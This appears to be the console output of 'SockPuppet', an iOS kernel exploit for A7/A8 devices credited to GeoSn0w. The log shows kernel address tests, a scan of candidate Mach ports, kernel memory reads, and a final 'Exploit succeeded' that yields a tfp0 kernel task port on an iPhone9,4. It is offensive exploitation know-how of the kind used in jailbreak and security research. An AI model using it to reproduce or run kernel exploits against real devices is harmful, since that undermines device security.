- SockPuppet Kernel Exploit For A7/A8 (4K) By GeoSn0w
- On top of Ned Williamson's exploit!
- [D] platform: iPhone9,4 16E227
- TestKit: Kernel Address Tested: 0xffffffffdeadbeef ----- NOT A KADDR! Bail out
- TestKit: Kernel Address Tested: 0xffffffe002690bd0 ----- GOT A KADDR!
- Task port is 0xffffffe002690bd0
- TestKit: Kernel Address Tested: 0xffffffe0003562c8 ----- GOT A KADDR!
- Got candidate port: 0xffffffe000354000
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe0003540a8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354150
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003541f8
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003542a0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354348
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003543f0
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354498
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354540
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003545e8
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354690
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354738
- --> Port IP_BITS: 0x8d78e894
- Got candidate port: 0xffffffe0003547e0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354888
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354930
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003549d8
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354a80
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354b28
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354bd0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354c78
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354d20
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354dc8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354e70
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354f18
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354fc0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355068
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355110
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003551b8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355260
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355308
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003553b0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355458
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355500
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003555a8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355650
- --> Port IP_BITS: 0x80008008
- Got candidate port: 0xffffffe0003556f8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003557a0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355848
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003558f0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355998
- --> Port IP_BITS: 0x80000013
- Got candidate port: 0xffffffe000355a40
- --> Port IP_BITS: 0x8000001a
- Got candidate port: 0xffffffe000355ae8
- --> Port IP_BITS: 0x80000019
- Got candidate port: 0xffffffe000355b90
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355c38
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355ce0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355d88
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355e30
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355ed8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355f80
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000356028
- --> Port IP_BITS: 0x80000005
- Got candidate port: 0xffffffe0003560d0
- --> Port IP_BITS: 0x80000007
- Got candidate port: 0xffffffe000356178
- --> Port IP_BITS: 0x80000006
- Got candidate port: 0xffffffe000356220
- --> Port IP_BITS: 0x80000004
- Got candidate port: 0xffffffe0003562c8
- --> Port IP_BITS: 0x80000003
- Got candidate port: 0xffffffe000356370
- --> Port IP_BITS: 0x80000011
- Got candidate port: 0xffffffe000356418
- --> Port IP_BITS: 0x80000028
- Got candidate port: 0xffffffe0003564c0
- --> Port IP_BITS: 0x80000002
- --> Task: 0xffffffe00037dc20
- --> PID: 0
- TestKit: Kernel Address Tested: 0xffffffe002690bd0 ----- GOT A KADDR!
- Found a KADDR
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- kernel_task port found; read 0xffffffe004d87648 from 0xffffffe005e08800
- Copied fake kernel_task port to its own page, cleaning up...
- Exploit succeeded
- Got: tfp0 0x25607
- iPhone9,4 Cat 18.5.0 Darwin Darwin Kernel Version 18.5.0: Tue Mar 5 19:52:17 PST 2019; root:xnu-4903.252.2~1/RELEASE_ARM64_T8010
- Page size is 0x4000